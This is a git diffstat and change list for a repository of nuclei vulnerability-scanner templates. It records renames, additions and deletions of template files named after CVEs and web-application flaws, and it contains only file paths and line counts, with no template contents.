nuclei-templates/Other/wp-super-cache.yaml | 2 +- .../Other/wp-super-forms-11588.yaml | 22 - nuclei-templates/Other/wp-super-forms.yaml | 20 + nuclei-templates/Other/wp-sym404.yaml | 5 +- nuclei-templates/Other/wp-test-email.yaml | 59 + .../Other/wp-theme-diarise-lfi.yaml | 2 +- nuclei-templates/Other/wp-tinymce-lfi.yaml | 14 +- .../wp-tinymce-thumbnail-plugin-lfi.yaml | 2 +- ...lfi-11601.yaml => wp-tutor-lfi-11596.yaml} | 0 .../Other/wp-under-construction-ssrf.yaml | 17 +- .../Other/wp-upload-data-11604.yaml | 24 + nuclei-templates/Other/wp-upload-data.yaml | 29 - nuclei-templates/Other/wp-user-avatar.yaml | 5 +- nuclei-templates/Other/wp-userenum.yaml | 93 - .../Other/wp-vault-lfi-11611.yaml | 24 - .../Other/wp-vault-lfi-11612.yaml | 24 + .../Other/wp-wechat-broadcast-lfi.yaml | 5 +- nuclei-templates/Other/wp-whmcs-xss.yaml | 5 - ...-woocommerce-email-verification-11616.yaml | 25 + .../wp-woocommerce-email-verification.yaml | 28 - ...> wp-woocommerce-file-download-11620.yaml} | 0 ...xmlrpc-11629.yaml => wp-xmlrpc-11631.yaml} | 0 .../Other/wp-xmlrpc-brute-force.yaml | 45 - .../wp-xmlrpc-pingback-detection-11628.yaml | 38 + .../Other/wp-xmlrpc-pingback-detection.yaml | 35 - .../Other/wp-yoast-user-enumeration.yaml | 5 +- nuclei-templates/Other/wpcf7-recaptcha.yaml | 2 +- nuclei-templates/Other/wpcf7-redirect.yaml | 2 +- nuclei-templates/Other/wpconfig.yaml | 28 + .../Other/wpdm-cache-session.yaml | 6 +- ...config.yaml => wpengine-config-check.yaml} | 0 .../Other/wpeprivate-config-disclosure.yaml | 2 +- nuclei-templates/Other/wpforms-lite.yaml | 2 +- .../Other/wpify-woo-czech-xss.yaml | 5 +- ...aml => wpmudev-my-calender-xss-11502.yaml} | 0 .../Other/wpmudev-pub-keys-11504.yaml | 24 + nuclei-templates/Other/wpmudev-pub-keys.yaml | 26 - nuclei-templates/Other/wps-hide-login.yaml | 2 +- .../Other/wptouch-open-redirect-11594.yaml | 27 - .../Other/wptouch-open-redirect-11595.yaml | 25 + .../Other/wptouch-plugin-open-redirect.yaml | 19 + 
nuclei-templates/Other/wptouch-xss.yaml | 9 +- nuclei-templates/Other/ws-ftp-ini.yaml | 6 +- nuclei-templates/Other/ws-ftp-log.yaml | 6 +- .../Other/ws_ftp-server-web-transfer.yaml | 9 +- nuclei-templates/Other/ws_ftp-ssh-detect.yaml | 3 +- nuclei-templates/Other/wsdl-api-11632.yaml | 17 - nuclei-templates/Other/wsdl-api.yaml | 15 + .../Other/wso2-2019-0598-11635.yaml | 30 + .../Other/wso2-apimanager-detect-11639.yaml | 4 - .../Other/wso2-default-login.yaml | 15 +- .../Other/wso2-management-console-11645.yaml | 22 + .../Other/wso2-management-console.yaml | 19 - .../Other/wso2-products-detect.yaml | 6 +- .../Other/wuzhicms-sqli-11659.yaml | 23 + nuclei-templates/Other/wuzhicms-sqli.yaml | 23 - .../Other/x-content-type-options.yaml | 6 +- .../Other/x-forwarded-reflection.yaml | 18 +- nuclei-templates/Other/x-frame-options.yaml | 6 +- .../Other/x-recruiting-header.yaml | 13 +- nuclei-templates/Other/x-ui.yaml | 22 + .../Other/xampp-default-page-11662.yaml | 20 + .../Other/xampp-default-page-11663.yaml | 23 - .../Other/xampp-environment-variables.yaml | 6 +- ...{xdcms-sqli.yaml => xdcms-sqli-11666.yaml} | 0 .../Other/xds-amr-status-11669.yaml | 26 + nuclei-templates/Other/xds-amr-status.yaml | 30 - .../Other/xeams-admin-console.yaml | 15 +- nuclei-templates/Other/xenforo-detect.yaml | 5 +- ...ro-login.yaml => xenforo-login-11670.yaml} | 0 .../Other/xenmobile-login-11677.yaml | 22 - nuclei-templates/Other/xenmobile-login.yaml | 19 + .../Other/xenmobile-server-log4j.yaml | 43 +- nuclei-templates/Other/xenmobile_server.yaml | 20 + .../Other/xerox-d95-copier-webserver.yaml | 6 +- .../Other/xerox-efi-lfi-11682.yaml | 27 - .../Other/xerox-efi-lfi-11683.yaml | 33 + .../Other/xerox-phaser-7500dt-webserver.yaml | 6 +- .../Other/xerox-workcentre-detect.yaml | 59 +- .../Other/xerox7-default-login-11678.yaml | 46 + .../Other/xerox7-default-login.yaml | 47 - .../Other/xff-403-bypass-11684.yaml | 7 +- nuclei-templates/Other/xfinity-panel.yaml | 9 +- 
.../Other/xiaomi-wireless-router-login.yaml | 7 +- nuclei-templates/Other/xibocms-login.yaml | 9 +- .../Other/xlight-ftp-service-detect.yaml | 64 +- .../Other/xml-schema-detect-11691.yaml | 24 - nuclei-templates/Other/xml-schema-detect.yaml | 21 + .../Other/xmlrpc-pingback-ssrf-11687.yaml | 3 - .../Other/xnat-default-login.yaml | 5 +- nuclei-templates/Other/xnat-login.yaml | 9 +- nuclei-templates/Other/xnat.yaml | 20 + .../Other/xoops-installation-wizard.yaml | 11 +- ...webcam-11698.yaml => xp-webcam-11697.yaml} | 0 .../Other/xprober-service-11694.yaml | 17 + nuclei-templates/Other/xprober-service.yaml | 19 - .../Other/xss-deprecated-header.yaml | 9 +- nuclei-templates/Other/xss-fuzz.yaml | 83 +- nuclei-templates/Other/xss-oracle.yaml | 42 +- .../Other/xss-serialize-javascript.yaml | 12 +- nuclei-templates/Other/xsstest.yaml | 80 - nuclei-templates/Other/xui-weak-login.yaml | 10 +- nuclei-templates/Other/xvr-login-11704.yaml | 23 + nuclei-templates/Other/xvr-login.yaml | 20 - nuclei-templates/Other/xweb500-panel.yaml | 12 +- ...ct.yaml => xxljob-admin-detect-11708.yaml} | 0 .../Other/xxljob-default-login-11711.yaml | 44 - .../Other/xxljob-default-login-11714.yaml | 56 + .../Other/xxljob-panel-11716.yaml | 23 +- ...tect-11720.yaml => yapi-detect-11719.yaml} | 0 .../{yapi-rce.yaml => yapi-rce-11724.yaml} | 0 nuclei-templates/Other/yarn-lock-11728.yaml | 25 + nuclei-templates/Other/yarn-lock.yaml | 30 - .../Other/yarn-manager-exposure-11733.yaml | 19 - .../Other/yarn-manager-exposure.yaml | 17 + .../Other/yarn-resourcemanager-rce-11735.yaml | 25 - .../Other/yarn-resourcemanager-rce.yaml | 21 + nuclei-templates/Other/yellowfin-panel.yaml | 7 +- nuclei-templates/Other/yeswiki-detect.yaml | 8 +- nuclei-templates/Other/yeswiki-sql.yaml | 8 +- .../Other/yeswiki-stored-xss.yaml | 11 +- nuclei-templates/Other/yeswiki-xss.yaml | 13 +- nuclei-templates/Other/yeswiki.yaml | 20 + .../Other/yii-debugger-11738.yaml | 34 + nuclei-templates/Other/yii-debugger.yaml | 37 - 
nuclei-templates/Other/yii-error-page.yaml | 4 +- ...min-lfi.yaml => yishaadmin-lfi-11744.yaml} | 0 .../Other/yith-woocommerce-compare.yaml | 6 +- .../Other/yith-woocommerce-wishlist.yaml | 2 +- .../Other/yongyou-ICurrtype-sqli.yaml | 42 - nuclei-templates/Other/yongyou-jdbcread.yaml | 38 + nuclei-templates/Other/yongyou-rce.yaml | 4 - nuclei-templates/Other/yongyou-ssrf.yaml | 10 +- ...you-u8-RegisterServlet-sql-Injection.yaml} | 0 ...qli.yaml => yongyou-u8-oa-sqli-11747.yaml} | 0 .../Other/yonyou-nc-workflow.yaml | 3 +- nuclei-templates/Other/yonyou-u8-oa-sqli.yaml | 19 +- nuclei-templates/Other/yonyou-u8-sqli.yaml | 18 +- ..._ncchr_attachment_uploadchunk_upload.yaml} | 0 ...ass-panel.yaml => yopass-panel-11749.yaml} | 0 nuclei-templates/Other/youtube.yaml | 45 +- ...fileRead.yaml => yunxintong-fileread.yaml} | 0 .../Other/yzmcms-detect-11751.yaml | 23 - nuclei-templates/Other/yzmcms-detect.yaml | 19 + nuclei-templates/Other/yzmcms-panel.yaml | 13 +- .../Other/zabbix-dashboards-access.yaml | 58 +- .../Other/zabbix-default-credentials.yaml | 7 +- ...n-11762.yaml => zabbix-default-login.yaml} | 0 nuclei-templates/Other/zabbix-error.yaml | 4 - .../Other/zabbix-server-login.yaml | 4 +- nuclei-templates/Other/zap-api-detect.yaml | 8 +- nuclei-templates/Other/zapier-webhook.yaml | 5 +- .../Other/zblog-exposed-admin-panel.yaml | 14 +- nuclei-templates/Other/zblogphp-panel.yaml | 10 +- .../Other/zcms-v3-sqli-11775.yaml | 21 + nuclei-templates/Other/zcms-v3-sqli.yaml | 21 - .../Other/zebra-printer-detect.yaml | 5 +- .../Other/zend-server-test-page.yaml | 5 +- nuclei-templates/Other/zend-v1-xss.yaml | 6 +- ...enphoto-installation-sensitive-info-1.yaml | 34 + ...enphoto-installation-sensitive-info-2.yaml | 34 + ...enphoto-installation-sensitive-info-3.yaml | 34 + ...enphoto-installation-sensitive-info-4.yaml | 34 + .../zenphoto-installation-sensitive-info.yaml | 8 +- nuclei-templates/Other/zenphoto-setup.yaml | 8 +- nuclei-templates/Other/zenscrape-api-key.yaml | 7 +- 
nuclei-templates/Other/zenserp-api-key.yaml | 7 +- ...ct-11787.yaml => zentao-detect-11785.yaml} | 0 nuclei-templates/Other/zentao.yaml | 22 + nuclei-templates/Other/zentral-detection.yaml | 3 - nuclei-templates/Other/zentral-panel.yaml | 11 +- .../Other/zerof-webserver-detect.yaml | 6 +- nuclei-templates/Other/zeroshell-login.yaml | 2 +- .../Other/zhixiang-oa-msglog-sqli.yaml | 21 +- .../Other/zhiyuan-file-upload-11791.yaml | 29 - .../Other/zhiyuan-file-upload.yaml | 28 + .../Other/zhiyuan-oa-info-leak-11799.yaml | 22 + .../Other/zhiyuan-oa-info-leak.yaml | 26 - .../Other/zhiyuan-oa-session-leak.yaml | 8 +- ...aml => zhiyuan-oa-unauthorized-11806.yaml} | 0 nuclei-templates/Other/zimbra-detect.yaml | 6 +- .../Other/zimbra-preauth-ssrf-11811.yaml | 23 - .../Other/zimbra-preauth-ssrf.yaml | 28 + .../Other/zimbra-web-client-11814.yaml | 4 - nuclei-templates/Other/zimbra-web-login.yaml | 19 +- .../Other/zip-backup-files-11819.yaml | 62 - .../Other/zip-backup-files-11820.yaml | 64 + .../Other/zip-path-overwrite.yaml | 28 +- nuclei-templates/Other/zipkin-exposure.yaml | 2 +- .../Other/zm-system-log-detect-11833.yaml | 25 - .../Other/zm-system-log-detect-11834.yaml | 21 + .../Other/zmanda-default-login-11825.yaml | 36 + .../Other/zmanda-default-login.yaml | 39 - .../Other/zms-auth-bypass-11830.yaml | 36 - nuclei-templates/Other/zms-auth-bypass.yaml | 33 + nuclei-templates/Other/zms-sqli.yaml | 8 +- nuclei-templates/Other/zoneminder-login.yaml | 12 +- nuclei-templates/Other/zope-detect.yaml | 5 +- nuclei-templates/Other/zrypt-malware.yaml | 7 +- nuclei-templates/Other/zte-panel-11840.yaml | 24 + nuclei-templates/Other/zte-panel.yaml | 21 - nuclei-templates/Other/zuul-panel-11843.yaml | 27 + nuclei-templates/Other/zuul-panel.yaml | 33 - .../Other/zyxel-firewall-panel.yaml | 9 +- .../Other/zyxel-router-panel.yaml | 13 +- .../Other/zyxel-vmg1312b10d-login.yaml | 12 +- .../Other/zyxel-vsg1432b101-login.yaml | 8 +- nuclei-templates/Other/zzcms-xss.yaml | 10 +- 
nuclei-templates/Other/zzzcms-ssrf.yaml | 4 +- nuclei-templates/Other/zzzcms-xss.yaml | 4 +- 7520 files changed, 187532 insertions(+), 80486 deletions(-) rename nuclei-templates/CVE-2000/{cve-2000-0114.yaml => CVE-2000-0114.yaml} (100%) rename nuclei-templates/CVE-2001/{CVE-2001-1473.yaml => cve-2001-1473.yaml} (100%) create mode 100644 nuclei-templates/CVE-2005/CVE-2005-2428.yaml delete mode 100644 nuclei-templates/CVE-2005/cve-2005-2428.yaml rename nuclei-templates/CVE-2005/{CVE-2005-4385.yaml => cve-2005-4385.yaml} (100%) rename nuclei-templates/CVE-2006/{cve-2006-1681.yaml => CVE-2006-1681.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2007/CVE-2007-0885.yaml delete mode 100644 nuclei-templates/CVE-2007/CVE-2007-4556.yaml delete mode 100644 nuclei-templates/CVE-2007/CVE-2007-5728.yaml create mode 100644 nuclei-templates/CVE-2007/cve-2007-0885.yaml create mode 100644 nuclei-templates/CVE-2007/cve-2007-4556.yaml create mode 100644 nuclei-templates/CVE-2007/cve-2007-5728.yaml rename nuclei-templates/CVE-2008/{cve-2008-2398.yaml => CVE-2008-2398.yaml} (100%) rename nuclei-templates/CVE-2008/{cve-2008-2650.yaml => CVE-2008-2650.yaml} (100%) rename nuclei-templates/CVE-2008/{CVE-2008-6172.yaml => cve-2008-6172.yaml} (100%) rename nuclei-templates/CVE-2008/{CVE-2008-6222.yaml => cve-2008-6222.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-1496.yaml => CVE-2009-1496.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-2100.yaml => CVE-2009-2100.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-3318.yaml => CVE-2009-3318.yaml} (100%) rename nuclei-templates/CVE-2009/{CVE-2009-2015.yaml => cve-2009-2015.yaml} (100%) rename nuclei-templates/CVE-2009/{CVE-2009-4679.yaml => cve-2009-4679.yaml} (100%) rename nuclei-templates/CVE-2009/{CVE-2009-5020.yaml => cve-2009-5020.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0759.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1081.yaml delete mode 100644 
nuclei-templates/CVE-2010/CVE-2010-1302.yaml rename nuclei-templates/CVE-2010/{cve-2010-1305.yaml => CVE-2010-1305.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1306.yaml => CVE-2010-1306.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1313.yaml => CVE-2010-1313.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1314.yaml => CVE-2010-1314.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1475.yaml => CVE-2010-1475.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1495.yaml => CVE-2010-1495.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1532.yaml rename nuclei-templates/CVE-2010/{cve-2010-1535.yaml => CVE-2010-1535.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1602.yaml => CVE-2010-1602.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1603.yaml => CVE-2010-1603.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1715.yaml => CVE-2010-1715.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1722.yaml => CVE-2010-1722.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1723.yaml rename nuclei-templates/CVE-2010/{cve-2010-1870.yaml => CVE-2010-1870.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1954.yaml => CVE-2010-1954.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1956.yaml => CVE-2010-1956.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1981.yaml => CVE-2010-1981.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1982.yaml => CVE-2010-1982.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2033.yaml => CVE-2010-2033.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2035.yaml => CVE-2010-2035.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2259.yaml rename nuclei-templates/CVE-2010/{cve-2010-2307.yaml => CVE-2010-2307.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2680.yaml => CVE-2010-2680.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2857.yaml delete mode 100644 
nuclei-templates/CVE-2010/CVE-2010-2918.yaml rename nuclei-templates/CVE-2010/{cve-2010-2920.yaml => CVE-2010-2920.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-4617.yaml => CVE-2010-4617.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-4977.yaml rename nuclei-templates/CVE-2010/{cve-2010-5278.yaml => CVE-2010-5278.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-0157.yaml => cve-2010-0157.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-0759.yaml rename nuclei-templates/CVE-2010/{CVE-2010-0942.yaml => cve-2010-0942.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-0944.yaml => cve-2010-0944.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1081.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1217.yaml => cve-2010-1217.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1302.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1352.yaml => cve-2010-1352.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1353.yaml => cve-2010-1353.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1354.yaml => cve-2010-1354.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1472.yaml => cve-2010-1472.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1473.yaml => cve-2010-1473.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1491.yaml => cve-2010-1491.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1531.yaml => cve-2010-1531.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1532.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1601.yaml => cve-2010-1601.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1657.yaml => cve-2010-1657.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1718.yaml => cve-2010-1718.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1723.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1979.yaml => cve-2010-1979.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-2036.yaml => cve-2010-2036.yaml} 
(100%) rename nuclei-templates/CVE-2010/{CVE-2010-2050.yaml => cve-2010-2050.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-2128.yaml => cve-2010-2128.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-2259.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2857.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2918.yaml rename nuclei-templates/CVE-2010/{CVE-2010-3203.yaml => cve-2010-3203.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-4239.yaml => cve-2010-4239.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-4977.yaml delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-0049.yaml rename nuclei-templates/CVE-2011/{cve-2011-1669.yaml => CVE-2011-1669.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-4336.yaml delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-4926.yaml rename nuclei-templates/CVE-2011/{cve-2011-5107.yaml => CVE-2011-5107.yaml} (100%) rename nuclei-templates/CVE-2011/{cve-2011-5179.yaml => CVE-2011-5179.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-5181.yaml rename nuclei-templates/CVE-2011/{cve-2011-5265.yaml => CVE-2011-5265.yaml} (100%) create mode 100644 nuclei-templates/CVE-2011/cve-2011-0049.yaml create mode 100644 nuclei-templates/CVE-2011/cve-2011-4336.yaml create mode 100644 nuclei-templates/CVE-2011/cve-2011-4926.yaml create mode 100644 nuclei-templates/CVE-2011/cve-2011-5181.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-0991.yaml create mode 100644 nuclei-templates/CVE-2012/CVE-2012-2122.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4768.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4940.yaml rename nuclei-templates/CVE-2012/{CVE-2012-0901.yaml => cve-2012-0901.yaml} (100%) rename nuclei-templates/CVE-2012/{CVE-2012-0981.yaml => cve-2012-0981.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/cve-2012-0991.yaml rename nuclei-templates/CVE-2012/{CVE-2012-3153.yaml => 
cve-2012-3153.yaml} (100%) mode change 100644 => 100755 create mode 100644 nuclei-templates/CVE-2012/cve-2012-4768.yaml create mode 100644 nuclei-templates/CVE-2012/cve-2012-4940.yaml rename nuclei-templates/CVE-2012/{CVE-2012-5913.yaml => cve-2012-5913.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-1965.yaml delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-2248.yaml rename nuclei-templates/CVE-2013/{cve-2013-2251.yaml => CVE-2013-2251.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-2287.yaml rename nuclei-templates/CVE-2013/{cve-2013-3827.yaml => CVE-2013-3827.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-4117.yaml create mode 100644 nuclei-templates/CVE-2013/CVE-2013-6281.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-1965.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-2248.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-2287.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-4117.yaml rename nuclei-templates/CVE-2013/{CVE-2013-5528.yaml => cve-2013-5528.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/cve-2013-6281.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-1203.yaml rename nuclei-templates/CVE-2014/{cve-2014-2323.yaml => CVE-2014-2323.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-4536.yaml rename nuclei-templates/CVE-2014/{cve-2014-4550.yaml => CVE-2014-4550.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4561.yaml => CVE-2014-4561.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4592.yaml => CVE-2014-4592.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4940.yaml => CVE-2014-4940.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-5368.yaml => CVE-2014-5368.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-6271.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-9094.yaml rename nuclei-templates/CVE-2014/{cve-2014-9444.yaml => CVE-2014-9444.yaml} (100%) rename 
nuclei-templates/CVE-2014/{cve-2014-9606.yaml => CVE-2014-9606.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9607.yaml => CVE-2014-9607.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9608.yaml => CVE-2014-9608.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9617.yaml => CVE-2014-9617.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9618.yaml => CVE-2014-9618.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-1203.yaml rename nuclei-templates/CVE-2014/{CVE-2014-2383.yaml => cve-2014-2383.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-2908.yaml => cve-2014-2908.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-3704.yaml => cve-2014-3704.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-4513.yaml => cve-2014-4513.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-4535.yaml => cve-2014-4535.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-4536.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-6271.yaml rename nuclei-templates/CVE-2014/{CVE-2014-8682.yaml => cve-2014-8682.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-9094.yaml rename nuclei-templates/CVE-2014/{CVE-2014-9615.yaml => cve-2014-9615.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-1880.yaml => CVE-2015-1880.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/CVE-2015-2794.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3224.yaml rename nuclei-templates/CVE-2015/{cve-2015-4414.yaml => CVE-2015-4414.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/CVE-2015-4666.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-4668.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-5354.yaml rename nuclei-templates/CVE-2015/{cve-2015-5688.yaml => CVE-2015-5688.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-6477.yaml => CVE-2015-6477.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-6544.yaml rename 
nuclei-templates/CVE-2015/{cve-2015-7377.yaml => CVE-2015-7377.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-7823.yaml => CVE-2015-7823.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-9480.yaml => CVE-2015-9480.yaml} (100%) rename nuclei-templates/CVE-2015/{CVE-2015-2166.yaml => cve-2015-2166.yaml} (100%) rename nuclei-templates/CVE-2015/{CVE-2015-2807.yaml => cve-2015-2807.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/cve-2015-3224.yaml rename nuclei-templates/CVE-2015/{CVE-2015-3306.yaml => cve-2015-3306.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/cve-2015-4666.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-4668.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-5354.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-6544.yaml rename nuclei-templates/CVE-2015/{CVE-2015-7450.yaml => cve-2015-7450.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000126.yaml => CVE-2016-1000126.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000127.yaml => CVE-2016-1000127.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000128.yaml => CVE-2016-1000128.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000133.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000134.yaml rename nuclei-templates/CVE-2016/{cve-2016-1000135.yaml => CVE-2016-1000135.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000138.yaml => CVE-2016-1000138.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000141.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000142.yaml rename nuclei-templates/CVE-2016/{cve-2016-1000148.yaml => CVE-2016-1000148.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000149.yaml => CVE-2016-1000149.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-10033.yaml => CVE-2016-10033.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-10960.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1555.yaml 
rename nuclei-templates/CVE-2016/{cve-2016-2004.yaml => CVE-2016-2004.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-3088.yaml => CVE-2016-3088.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-4975.yaml => CVE-2016-4975.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-6277.yaml rename nuclei-templates/CVE-2016/{CVE-2016-0957.yaml => cve-2016-0957.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-1000129.yaml => cve-2016-1000129.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-1000132.yaml => cve-2016-1000132.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000133.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000134.yaml rename nuclei-templates/CVE-2016/{CVE-2016-1000139.yaml => cve-2016-1000139.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000141.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000142.yaml rename nuclei-templates/CVE-2016/{CVE-2016-1000153.yaml => cve-2016-1000153.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-10924.yaml => cve-2016-10924.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-10960.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1555.yaml rename nuclei-templates/CVE-2016/{CVE-2016-2389.yaml => cve-2016-2389.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-3081.yaml => cve-2016-3081.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-4977.yaml => cve-2016-4977.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-5649.yaml => cve-2016-5649.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-6277.yaml rename nuclei-templates/CVE-2016/{CVE-2016-8527.yaml => cve-2016-8527.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/CVE-2017-11512.yaml rename nuclei-templates/CVE-2017/{cve-2017-11610.yaml => CVE-2017-11610.yaml} (100%) mode change 100755 => 100644 nuclei-templates/CVE-2017/CVE-2017-12149.yaml rename nuclei-templates/CVE-2017/{cve-2017-12611.yaml => 
